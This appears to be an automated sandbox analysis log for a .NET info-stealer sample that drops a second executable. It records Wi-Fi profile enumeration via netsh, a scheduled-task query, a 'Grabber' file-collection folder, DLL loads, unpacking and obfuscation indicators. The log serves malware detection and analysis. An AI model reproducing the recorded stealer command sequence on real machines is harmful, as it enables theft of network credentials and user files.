Source: C:\Users\user\AppData\Local\Temp\uuhbr0xg.h20.exe Process created: C:\Windows\System32\schtasks.exe "schtasks.exe" /query /TN WinTask Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\uuhbr0xg.h20.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument C:\Users\user\AppData\Local\Temp\p.html Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\uuhbr0xg.h20.exe Process created: C:\Windows\System32\schtasks.exe "schtasks.exe" /query /TN WinTask Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\netsh.exe netsh wlan show profile
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\findstr.exe findstr All
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\netsh.exe netsh wlan show networks mode=bssid
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2184 --field-trial-handle=1980,i,12318035346667771544,14619284953737115548,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\chcp.com chcp 65001
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\taskkill.exe TaskKill /F /IM 6044
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\timeout.exe Timeout /T 2 /Nobreak
Source: C:\Users\user\Desktop\HTZ4az17lj.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Users\user\Desktop\HTZ4az17lj.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\Desktop\HTZ4az17lj.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\Desktop\HTZ4az17lj.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\Desktop\HTZ4az17lj.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Users\user\Desktop\HTZ4az17lj.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Users\user\Desktop\HTZ4az17lj.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Users\user\Desktop\HTZ4az17lj.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\Desktop\HTZ4az17lj.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\Desktop\HTZ4az17lj.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\Desktop\HTZ4az17lj.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Users\user\Desktop\HTZ4az17lj.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Users\user\Desktop\HTZ4az17lj.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\Desktop\HTZ4az17lj.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\Desktop\HTZ4az17lj.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\Desktop\HTZ4az17lj.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Users\user\Desktop\HTZ4az17lj.exe Section loaded: dhcpcsvc6.dll Jump to behavior
Source: C:\Users\user\Desktop\HTZ4az17lj.exe Section loaded: dhcpcsvc.dll Jump to behavior
Source: C:\Users\user\Desktop\HTZ4az17lj.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Users\user\Desktop\HTZ4az17lj.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Users\user\Desktop\HTZ4az17lj.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\HTZ4az17lj.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\Desktop\HTZ4az17lj.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\Desktop\HTZ4az17lj.exe Section loaded: windowscodecs.dll Jump to behavior
Source: C:\Users\user\Desktop\HTZ4az17lj.exe Section loaded: rasapi32.dll Jump to behavior
Source: C:\Users\user\Desktop\HTZ4az17lj.exe Section loaded: rasman.dll Jump to behavior
Source: C:\Users\user\Desktop\HTZ4az17lj.exe Section loaded: rtutils.dll Jump to behavior
Source: C:\Users\user\Desktop\HTZ4az17lj.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Users\user\Desktop\HTZ4az17lj.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Users\user\Desktop\HTZ4az17lj.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\Desktop\HTZ4az17lj.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Users\user\Desktop\HTZ4az17lj.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Users\user\Desktop\HTZ4az17lj.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Users\user\Desktop\HTZ4az17lj.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Users\user\Desktop\HTZ4az17lj.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Users\user\Desktop\HTZ4az17lj.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Users\user\Desktop\HTZ4az17lj.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Users\user\Desktop\HTZ4az17lj.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\Desktop\HTZ4az17lj.exe Section loaded: policymanager.dll Jump to behavior
Source: C:\Users\user\Desktop\HTZ4az17lj.exe Section loaded: msvcp110_win.dll Jump to behavior
Source: C:\Users\user\Desktop\HTZ4az17lj.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Users\user\Desktop\HTZ4az17lj.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Users\user\Desktop\HTZ4az17lj.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Users\user\Desktop\HTZ4az17lj.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Users\user\Desktop\HTZ4az17lj.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Users\user\Desktop\HTZ4az17lj.exe Section loaded: slc.dll Jump to behavior
Source: C:\Users\user\Desktop\HTZ4az17lj.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Users\user\Desktop\HTZ4az17lj.exe Section loaded: vaultcli.dll Jump to behavior
Source: C:\Users\user\Desktop\HTZ4az17lj.exe Section loaded: napinsp.dll Jump to behavior
Source: C:\Users\user\Desktop\HTZ4az17lj.exe Section loaded: pnrpnsp.dll Jump to behavior
Source: C:\Users\user\Desktop\HTZ4az17lj.exe Section loaded: wshbth.dll Jump to behavior
Source: C:\Users\user\Desktop\HTZ4az17lj.exe Section loaded: nlaapi.dll Jump to behavior
Source: C:\Users\user\Desktop\HTZ4az17lj.exe Section loaded: winrnr.dll Jump to behavior
Source: C:\Users\user\Desktop\HTZ4az17lj.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Users\user\Desktop\HTZ4az17lj.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Users\user\Desktop\HTZ4az17lj.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Users\user\Desktop\HTZ4az17lj.exe Section loaded: schannel.dll Jump to behavior
Source: C:\Users\user\Desktop\HTZ4az17lj.exe Section loaded: mskeyprotect.dll Jump to behavior
Source: C:\Users\user\Desktop\HTZ4az17lj.exe Section loaded: ntasn1.dll Jump to behavior
Source: C:\Users\user\Desktop\HTZ4az17lj.exe Section loaded: ncrypt.dll Jump to behavior
Source: C:\Users\user\Desktop\HTZ4az17lj.exe Section loaded: ncryptsslp.dll Jump to behavior
Source: C:\Users\user\Desktop\HTZ4az17lj.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Users\user\Desktop\HTZ4az17lj.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Windows\System32\schtasks.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\schtasks.exe Section loaded: taskschd.dll Jump to behavior
Source: C:\Windows\System32\schtasks.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\schtasks.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\schtasks.exe Section loaded: taskschd.dll Jump to behavior
Source: C:\Windows\System32\schtasks.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\schtasks.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\schtasks.exe Section loaded: taskschd.dll Jump to behavior
Source: C:\Windows\System32\schtasks.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\schtasks.exe Section loaded: xmllite.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\uuhbr0xg.h20.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\uuhbr0xg.h20.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\uuhbr0xg.h20.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\uuhbr0xg.h20.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\uuhbr0xg.h20.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\uuhbr0xg.h20.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\uuhbr0xg.h20.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\uuhbr0xg.h20.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\uuhbr0xg.h20.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\uuhbr0xg.h20.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\uuhbr0xg.h20.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\uuhbr0xg.h20.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\uuhbr0xg.h20.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\uuhbr0xg.h20.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\uuhbr0xg.h20.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\uuhbr0xg.h20.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\uuhbr0xg.h20.exe Section loaded: dhcpcsvc6.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\uuhbr0xg.h20.exe Section loaded: dhcpcsvc.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\uuhbr0xg.h20.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\uuhbr0xg.h20.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\uuhbr0xg.h20.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\uuhbr0xg.h20.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\uuhbr0xg.h20.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\uuhbr0xg.h20.exe Section loaded: windowscodecs.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\uuhbr0xg.h20.exe Section loaded: rasapi32.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\uuhbr0xg.h20.exe Section loaded: rasman.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\uuhbr0xg.h20.exe Section loaded: rtutils.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\uuhbr0xg.h20.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\uuhbr0xg.h20.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\uuhbr0xg.h20.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\uuhbr0xg.h20.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\uuhbr0xg.h20.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\uuhbr0xg.h20.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\uuhbr0xg.h20.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\uuhbr0xg.h20.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\uuhbr0xg.h20.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\uuhbr0xg.h20.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\uuhbr0xg.h20.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\uuhbr0xg.h20.exe Section loaded: policymanager.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\uuhbr0xg.h20.exe Section loaded: msvcp110_win.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\uuhbr0xg.h20.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\uuhbr0xg.h20.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Windows\System32\chcp.com Section loaded: ulib.dll
Source: C:\Windows\System32\chcp.com Section loaded: fsutilext.dll
Source: C:\Windows\System32\netsh.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\netsh.exe Section loaded: ifmon.dll
Source: C:\Windows\System32\netsh.exe Section loaded: iphlpapi.dll
Source: C:\Windows\System32\netsh.exe Section loaded: mprapi.dll
Source: C:\Windows\System32\netsh.exe Section loaded: rasmontr.dll
Source: C:\Windows\System32\netsh.exe Section loaded: rasapi32.dll
Source: C:\Windows\System32\netsh.exe Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\netsh.exe Section loaded: rasman.dll
Source: C:\Windows\System32\netsh.exe Section loaded: mfc42u.dll
Source: C:\Windows\System32\netsh.exe Section loaded: rasman.dll
Source: C:\Windows\System32\netsh.exe Section loaded: authfwcfg.dll
Source: C:\Windows\System32\netsh.exe Section loaded: fwpolicyiomgr.dll
Source: C:\Windows\System32\netsh.exe Section loaded: firewallapi.dll
Source: C:\Windows\System32\netsh.exe Section loaded: dnsapi.dll
Source: C:\Windows\System32\netsh.exe Section loaded: fwbase.dll
Source: C:\Windows\System32\netsh.exe Section loaded: dhcpcmonitor.dll
Source: C:\Windows\System32\netsh.exe Section loaded: dot3cfg.dll
Source: C:\Windows\System32\netsh.exe Section loaded: dot3api.dll
Source: C:\Windows\System32\netsh.exe Section loaded: onex.dll
Source: C:\Windows\System32\netsh.exe Section loaded: eappcfg.dll
Source: C:\Windows\System32\netsh.exe Section loaded: ncrypt.dll
Source: C:\Windows\System32\netsh.exe Section loaded: eappprxy.dll
Source: C:\Windows\System32\netsh.exe Section loaded: ntasn1.dll
Source: C:\Windows\System32\netsh.exe Section loaded: fwcfg.dll
Source: C:\Windows\System32\netsh.exe Section loaded: hnetmon.dll
Source: C:\Windows\System32\netsh.exe Section loaded: netshell.dll
Source: C:\Windows\System32\netsh.exe Section loaded: nlaapi.dll
Source: C:\Windows\System32\netsh.exe Section loaded: netsetupapi.dll
Source: C:\Windows\System32\netsh.exe Section loaded: netiohlp.dll
Source: C:\Windows\System32\netsh.exe Section loaded: dhcpcsvc.dll
Source: C:\Windows\System32\netsh.exe Section loaded: winnsi.dll
Source: C:\Windows\System32\netsh.exe Section loaded: nettrace.dll
Source: C:\Windows\System32\netsh.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\netsh.exe Section loaded: nshhttp.dll
Source: C:\Windows\System32\netsh.exe Section loaded: httpapi.dll
Source: C:\Windows\System32\netsh.exe Section loaded: nshipsec.dll
Source: C:\Windows\System32\netsh.exe Section loaded: userenv.dll
Source: C:\Windows\System32\netsh.exe Section loaded: activeds.dll
Source: C:\Windows\System32\netsh.exe Section loaded: polstore.dll
Source: C:\Windows\System32\netsh.exe Section loaded: winipsec.dll
Source: C:\Windows\System32\netsh.exe Section loaded: adsldpc.dll
Source: C:\Windows\System32\netsh.exe Section loaded: adsldpc.dll
Source: C:\Windows\System32\netsh.exe Section loaded: nshwfp.dll
Source: C:\Windows\System32\netsh.exe Section loaded: cabinet.dll
Source: C:\Windows\System32\netsh.exe Section loaded: p2pnetsh.dll
Source: C:\Windows\System32\netsh.exe Section loaded: p2p.dll
Source: C:\Windows\System32\netsh.exe Section loaded: profapi.dll
Source: C:\Windows\System32\netsh.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\netsh.exe Section loaded: rpcnsh.dll
Source: C:\Windows\System32\netsh.exe Section loaded: wcnnetsh.dll
Source: C:\Windows\System32\netsh.exe Section loaded: wlanapi.dll
Source: C:\Windows\System32\netsh.exe Section loaded: whhelper.dll
Source: C:\Windows\System32\netsh.exe Section loaded: winhttp.dll
Source: C:\Windows\System32\netsh.exe Section loaded: wlancfg.dll
Source: C:\Windows\System32\netsh.exe Section loaded: cryptsp.dll
Source: C:\Windows\System32\netsh.exe Section loaded: wshelper.dll
Source: C:\Windows\System32\netsh.exe Section loaded: wevtapi.dll
Source: C:\Windows\System32\netsh.exe Section loaded: mswsock.dll
Source: C:\Windows\System32\netsh.exe Section loaded: wwancfg.dll
Source: C:\Windows\System32\netsh.exe Section loaded: wwapi.dll
Source: C:\Windows\System32\netsh.exe Section loaded: wcmapi.dll
Source: C:\Windows\System32\netsh.exe Section loaded: rmclient.dll
Source: C:\Windows\System32\netsh.exe Section loaded: mobilenetworking.dll
Source: C:\Windows\System32\netsh.exe Section loaded: peerdistsh.dll
Source: C:\Windows\System32\netsh.exe Section loaded: uxtheme.dll
Source: C:\Windows\System32\netsh.exe Section loaded: slc.dll
Source: C:\Windows\System32\netsh.exe Section loaded: sppc.dll
Source: C:\Windows\System32\netsh.exe Section loaded: gpapi.dll
Source: C:\Windows\System32\netsh.exe Section loaded: ktmw32.dll
Source: C:\Windows\System32\netsh.exe Section loaded: mprmsg.dll
Source: C:\Windows\System32\netsh.exe Section loaded: windows.storage.dll
Source: C:\Windows\System32\netsh.exe Section loaded: wldp.dll
Source: C:\Windows\System32\netsh.exe Section loaded: msasn1.dll
Source: C:\Windows\System32\chcp.com Section loaded: ulib.dll
Source: C:\Windows\System32\chcp.com Section loaded: fsutilext.dll
Source: C:\Windows\System32\netsh.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\netsh.exe Section loaded: ifmon.dll
Source: C:\Windows\System32\netsh.exe Section loaded: iphlpapi.dll
Source: C:\Windows\System32\netsh.exe Section loaded: mprapi.dll
Source: C:\Windows\System32\netsh.exe Section loaded: rasmontr.dll
Source: C:\Windows\System32\netsh.exe Section loaded: rasapi32.dll
Source: C:\Windows\System32\netsh.exe Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\netsh.exe Section loaded: rasman.dll
Source: C:\Windows\System32\netsh.exe Section loaded: rasman.dll
Source: C:\Windows\System32\netsh.exe Section loaded: mfc42u.dll
Source: C:\Windows\System32\netsh.exe Section loaded: authfwcfg.dll
Source: C:\Windows\System32\netsh.exe Section loaded: fwpolicyiomgr.dll
Source: C:\Windows\System32\netsh.exe Section loaded: firewallapi.dll
Source: C:\Windows\System32\netsh.exe Section loaded: dnsapi.dll
Source: C:\Windows\System32\netsh.exe Section loaded: fwbase.dll
Source: C:\Windows\System32\netsh.exe Section loaded: dhcpcmonitor.dll
Source: C:\Windows\System32\netsh.exe Section loaded: dot3cfg.dll
Source: C:\Windows\System32\netsh.exe Section loaded: dot3api.dll
Source: C:\Windows\System32\netsh.exe Section loaded: onex.dll
Source: C:\Windows\System32\netsh.exe Section loaded: eappcfg.dll
Source: C:\Windows\System32\netsh.exe Section loaded: ncrypt.dll
Source: C:\Windows\System32\netsh.exe Section loaded: eappprxy.dll
Source: C:\Windows\System32\netsh.exe Section loaded: ntasn1.dll
Source: C:\Windows\System32\netsh.exe Section loaded: fwcfg.dll
Source: C:\Windows\System32\netsh.exe Section loaded: hnetmon.dll
Source: C:\Windows\System32\netsh.exe Section loaded: netshell.dll
Source: C:\Windows\System32\netsh.exe Section loaded: nlaapi.dll
Source: C:\Windows\System32\netsh.exe Section loaded: netsetupapi.dll
Source: C:\Windows\System32\netsh.exe Section loaded: netiohlp.dll
Source: C:\Windows\System32\netsh.exe Section loaded: dhcpcsvc.dll
Source: C:\Windows\System32\netsh.exe Section loaded: winnsi.dll
Source: C:\Windows\System32\netsh.exe Section loaded: nettrace.dll
Source: C:\Windows\System32\netsh.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\netsh.exe Section loaded: nshhttp.dll
Source: C:\Windows\System32\netsh.exe Section loaded: httpapi.dll
Source: C:\Windows\System32\netsh.exe Section loaded: nshipsec.dll
Source: C:\Windows\System32\netsh.exe Section loaded: userenv.dll
Source: C:\Windows\System32\netsh.exe Section loaded: activeds.dll
Source: C:\Windows\System32\netsh.exe Section loaded: polstore.dll
Source: C:\Windows\System32\netsh.exe Section loaded: winipsec.dll
Source: C:\Windows\System32\netsh.exe Section loaded: adsldpc.dll
Source: C:\Windows\System32\netsh.exe Section loaded: nshwfp.dll
Source: C:\Windows\System32\netsh.exe Section loaded: cabinet.dll
Source: C:\Windows\System32\netsh.exe Section loaded: p2pnetsh.dll
Source: C:\Windows\System32\netsh.exe Section loaded: p2p.dll
Source: C:\Windows\System32\netsh.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\netsh.exe Section loaded: profapi.dll
Source: C:\Windows\System32\netsh.exe Section loaded: rpcnsh.dll
Source: C:\Windows\System32\netsh.exe Section loaded: wcnnetsh.dll
Source: C:\Windows\System32\netsh.exe Section loaded: wlanapi.dll
Source: C:\Windows\System32\netsh.exe Section loaded: whhelper.dll
Source: C:\Windows\System32\netsh.exe Section loaded: winhttp.dll
Source: C:\Windows\System32\netsh.exe Section loaded: wlancfg.dll
Source: C:\Windows\System32\netsh.exe Section loaded: cryptsp.dll
Source: C:\Windows\System32\netsh.exe Section loaded: wshelper.dll
Source: C:\Windows\System32\netsh.exe Section loaded: wevtapi.dll
Source: C:\Windows\System32\netsh.exe Section loaded: mswsock.dll
Source: C:\Windows\System32\netsh.exe Section loaded: wwancfg.dll
Source: C:\Windows\System32\netsh.exe Section loaded: wwapi.dll
Source: C:\Windows\System32\netsh.exe Section loaded: wcmapi.dll
Source: C:\Windows\System32\netsh.exe Section loaded: rmclient.dll
Source: C:\Windows\System32\netsh.exe Section loaded: mobilenetworking.dll
Source: C:\Windows\System32\netsh.exe Section loaded: peerdistsh.dll
Source: C:\Windows\System32\netsh.exe Section loaded: uxtheme.dll
Source: C:\Windows\System32\netsh.exe Section loaded: slc.dll
Source: C:\Windows\System32\netsh.exe Section loaded: sppc.dll
Source: C:\Windows\System32\netsh.exe Section loaded: gpapi.dll
Source: C:\Windows\System32\netsh.exe Section loaded: ktmw32.dll
Source: C:\Windows\System32\netsh.exe Section loaded: mprmsg.dll
Source: C:\Windows\System32\netsh.exe Section loaded: windows.storage.dll
Source: C:\Windows\System32\netsh.exe Section loaded: wldp.dll
Source: C:\Windows\System32\netsh.exe Section loaded: msasn1.dll
Source: C:\Windows\System32\schtasks.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\schtasks.exe Section loaded: taskschd.dll
Source: C:\Windows\System32\schtasks.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\schtasks.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\schtasks.exe Section loaded: taskschd.dll
Source: C:\Windows\System32\schtasks.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\cmd.exe Section loaded: cmdext.dll
Source: C:\Windows\System32\chcp.com Section loaded: ulib.dll
Source: C:\Windows\System32\chcp.com Section loaded: fsutilext.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: version.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: mpr.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: framedynos.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: dbghelp.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: netutils.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: wbemcomn.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: winsta.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: amsi.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: userenv.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: profapi.dll
Source: C:\Windows\System32\timeout.exe Section loaded: version.dll
Source: C:\Users\user\Desktop\HTZ4az17lj.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32 Jump to behavior
Source: Google Drive.lnk.4.dr LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: YouTube.lnk.4.dr LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Sheets.lnk.4.dr LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Gmail.lnk.4.dr LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Slides.lnk.4.dr LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Docs.lnk.4.dr LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: C:\Users\user\Desktop\HTZ4az17lj.exe File written: C:\Users\user\AppData\Local\d0d733758fee67ef1333def91e74c359\user@226533_en-CH\Grabber\DRIVE-C\Users\user\Pictures\desktop.ini Jump to behavior
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Users\user\Desktop\HTZ4az17lj.exe File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll Jump to behavior
Source: HTZ4az17lj.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
Source: HTZ4az17lj.exe Static PE information: Image base 0x140000000 > 0x60000000
Source: HTZ4az17lj.exe Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: winload_prod.pdb source: Temp.txt.0.dr
Source: Binary string: ntkrnlmp.pdb source: Temp.txt.0.dr
Source: Binary string: winload_prod.pdb\ source: Temp.txt.0.dr
Source: Binary string: ntkrnlmp.pdb\ source: Temp.txt.0.dr

Data Obfuscation
barindex
.NET source code contains potential unpacker
Source: HTZ4az17lj.exe, Type_9.cs .Net Code: Method_42 System.AppDomain.Load(byte[])
Source: HTZ4az17lj.exe, Type_9.cs .Net Code: Method_42
Source: uuhbr0xg.h20.exe.0.dr, Type_9.cs .Net Code: Method_42 System.AppDomain.Load(byte[])
Source: uuhbr0xg.h20.exe.0.dr, Type_9.cs .Net Code: Method_42
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\Desktop\HTZ4az17lj.exe Code function: 0_2_00007FF848F2217C pushad ; iretd 0_2_00007FF848F22183
Source: C:\Users\user\Desktop\HTZ4az17lj.exe Code function: 0_2_00007FF848F1D1C8 push ebx; retf 0001h 0_2_00007FF848F1D1EA
Source: C:\Users\user\Desktop\HTZ4az17lj.exe Code function: 0_2_00007FF848F1ED8A push eax; retf 0_2_00007FF848F1ED8B
Source: C:\Users\user\Desktop\HTZ4az17lj.exe Code function: 0_2_00007FF848F16DA0 push eax; iretd 0_2_00007FF848F16DAD
Source: C:\Users\user\AppData\Local\Temp\uuhbr0xg.h20.exe Code function: 11_2_00007FF848F16DA0 push eax; iretd 11_2_00007FF848F16DAD
Drops PE files
Source: C:\Users\user\Desktop\HTZ4az17lj.exe File created: C:\Users\user\AppData\Local\Temp\uuhbr0xg.h20.exe Jump to dropped file

Boot Survival
barindex
Uses schtasks.exe or at.exe to add and modify task schedules
Source: C:\Users\user\Desktop\HTZ4az17lj.exe Process created: C:\Windows\System32\schtasks.exe "schtasks.exe" /query /TN WinTask
Stores files to the Windows start menu directory
Source: C:\Program Files\Google\Chrome\Application\chrome.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnk Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnk Jump to behavior
